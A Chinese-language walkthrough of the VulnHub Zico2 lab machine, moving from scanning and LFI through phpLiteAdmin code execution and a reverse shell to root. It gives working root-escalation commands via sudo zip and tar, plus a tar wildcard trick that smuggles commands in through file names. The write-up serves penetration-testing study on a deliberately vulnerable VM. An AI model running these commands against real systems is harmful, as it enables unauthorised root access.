本篇文章僅用於技術交流學習和研究的目的，嚴禁使用文章中的技術用於非法目的和破壞，否則造成一切後果與發表本文章的作者無關

靶機下載之後使用僅主機模式載入到本地VMware Workstation工作站，需要發現目標靶機的IP地址，可以使用nmap，netdiscover，或者arp之類的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 當然也是可以使用Windows環境下mac地址掃描工具都是可以的，那麼本次演示就是arp-scan工具發現

地址:https://www.vulnhub.com/entry/zico2-1,210/

sudo nmap -n -p- -sC -sV -A 192.168.226.133 -o zico.nmap

nmap掃描結果

開放了80埠，我們先看看web應用

每個功能點都點選了一下，發現上述的CHECK THEM OUT! 點了進去進入如下頁面

把圖片都點了下，頁面的URL沒啥動靜，不過看URL的形態構造像是存在LFI，那麼試試看看

看到有個使用者zico，先放著使用gobuster掃描下目錄看看，看是否有突破口

看到dbadmin 和tools目錄，都訪問了下，發現dbadmin目錄下面有個php檔案，然後訪問之後看到如下

看到對應的名稱和版本號，在谷歌上搜索了下預設密碼是什麼 ，結果在https://www.acunetix.com/vulnerabilities/web/phpliteadmin-default-password/

然後用給出的名稱在本地kali上搜索了下，看是否存在漏洞

確認存在遠端程式碼執行漏洞，版本剛好對應上 1.9.3 對應exploit地址：https://www.exploit-db.com/exploits/24044

按照提示操作即可

建立表資訊，然後就可以建立php一句話程式碼了

測試執行效果

能夠執行命令，那麼這裡就通過使用Python反彈shell的形式拿shell，還可以使用metasploit，不過這個太偷懶了，畢竟是學東西，還有其他形式的反彈shell

https://jkme.github.io/pages/reverse-shell.html
 

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

最終將Python的反彈shell程式碼經過URL編碼通過上面的檔案包含漏洞執行反彈成功shell

升級tty-shell

反彈成功之後，首先到家目錄看看，發現WordPress目錄，進去看看配置檔案目錄，看了一下，發現zico的資料庫密碼，用這個密碼去試試ssh登入

通過ssh登入看看

進去之後一把梭，執行了sudo -l 發現可以通過tar和zip進行提權，真好，擦！

---------------------------------------------------------------------------------------------------------------------------------------------

使用zip進行提權

zip提權大概意思就是本地新建一個空檔案，然後使用zip打包，再指定需要執行的命令即可 參考：https://www.freebuf.com/articles/system/206007.html

zico@zico:~$ touch bmfx
zico@zico:~$ sudo zip /tmp/bmfx.zip /home/zico/bmfx -T --unzip-command="sh -c /bin/bash"
  adding: home/zico/bmfx (stored 0%)
root@zico:~# id
uid=0(root) gid=0(root) groups=0(root)

使用tar進行提權

tar提權重點是一樣的需要帶入引數--checkpoint 和 --checkpoint-action來執行命令，大概意思同樣是打包某一個檔案，但根據上面的命令實際並沒有使用tar打包，因為使用了/dev/null 最終目的是為了能夠帶入引數執行命令

zico@zico:~$ touch bmfx
zico@zico:~$ sudo tar cf /dev/null /home/zico/bmfx --checkpoint=1 --checkpoint-action=exec=/bin/bash
tar: Removing leading `/' from member names
root@zico:~# whoami
root
root@zico:~# id
uid=0(root) gid=0(root) groups=0(root)

髒牛提權

此方法網上有兩個對應的exp，通過加使用者的形式穩定，對應exp地址：https://github.com/FireFart/dirtycow不打算演示

另一種本地提權

參考：https://www.exploit-db.com/exploits/33589

使用find進行提權

大概意思如下：

find提權 (其實這裡也是使用了tar進行執行提權，然後轉到find，重點是find執行命令提權)
檢視是否存在find命令setuid執行許可權
find / -perm -4000 2>/dev/null | grep find
通過tar命令建立find命令具備setuid執行許可權
cd /tmp
echo "chmod u+s /usr/bin/find" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
sudo tar cf archive.tar *
建立完成確認find命令是否成功被賦予setuid許可權
find / -perm -4000 2>/dev/null | grep find
執行find命令開始提權
find /tmp -exec sh -i \;

重點解釋下：

echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

上述兩條命令是為了建立兩個檔案，方便通過tar命令將此檔案當做命令去執行，需要理解這個即可，執行成功之後，檔案建立如下：

參考：

https://hackingresources.com/zico2-vulnhub-walkthrough/